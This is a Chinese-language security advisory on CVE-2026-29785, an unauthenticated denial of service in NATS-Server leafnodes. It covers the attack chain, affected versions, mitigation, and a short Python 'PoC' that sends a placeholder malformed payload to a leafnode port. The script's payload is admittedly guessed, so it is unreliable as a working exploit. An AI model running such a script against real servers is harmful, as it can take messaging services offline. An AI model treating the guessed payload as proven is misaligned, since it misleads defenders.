CVE-2026-29785 CVSS 7.5 高危

CVE-2026-29785 NATS-Server 远程拒绝服务漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29785

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NATS-Server

漏洞概述

NATS-Server 是一个高性能的云原生消息系统。在 2.11.14 和 2.12.5 之前的版本中，如果启用了非默认的“leafnode”配置，攻击者无需认证即可通过发送特制数据包触发服务 Panic 从而导致服务器崩溃。该漏洞发生在认证流程之前，且 leafnodes 默认启用了压缩功能，因此极易被利用。成功利用此漏洞可导致服务完全不可用，影响系统业务的连续性。

技术细节

该漏洞源于 NATS-Server 在处理启用了 leafnode 配置的连接时，对压缩数据包的处理逻辑存在缺陷。Leafnode 是 NATS 用于连接不同消息集群的组件，为了性能通常默认启用压缩。由于漏洞触发点位于认证流程之前，任何能够建立网络连接的攻击者都可以利用此漏洞。攻击者只需向 leafnode 端口发送特定的恶意压缩数据，即可触发服务器内部的 Panic（运行时恐慌），导致进程异常终止。由于 CVSS 向量显示 C:N/I:N/A:H，该漏洞主要影响系统的可用性，不会导致数据泄露或篡改。影响范围严格限定于启用了 leafnode 配置的 NATS 实例。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标网络，识别出开放了 NATS leafnode 端口（通常非默认端口）的服务器。

STEP 2

2. 建立连接

攻击者利用无需认证的特性，直接向目标服务器的 leafnode 端口发起 TCP 连接。

STEP 3

3. 触发漏洞

攻击者发送特制的恶意压缩数据包，利用解析逻辑缺陷触发服务器内部的 Panic 异常。

STEP 4

4. 拒绝服务

NATS-Server 进程因 Panic 而崩溃退出，导致消息服务中断，达成拒绝服务攻击目的。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# PoC for CVE-2026-29785
# This script attempts to trigger the panic by connecting to the leafnode port.
# Note: Specific payload bytes may vary based on the compression implementation details.

def exploit_poc(target_ip, target_port):
    try:
        print(f"[*] Connecting to {target_ip}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        
        # Sending malformed data to trigger the panic
        # Leafnodes usually expect specific protocol INFO, sending garbage or partial headers might trigger the bug
        payload = b"\x00\x00\x00\x00MALFORMED_COMPRESSION_DATA"
        s.send(payload)
        print("[+] Payload sent. Check if server crashed.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    exploit_poc("127.0.0.1", 7422)  # Default leafnode port might vary

影响范围

NATS-Server < 2.11.14

NATS-Server < 2.12.5

防御指南

临时缓解措施

建议用户尽快升级至修复版本。如果暂时无法升级，应在配置文件中禁用 leafnode 端口上的压缩功能，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表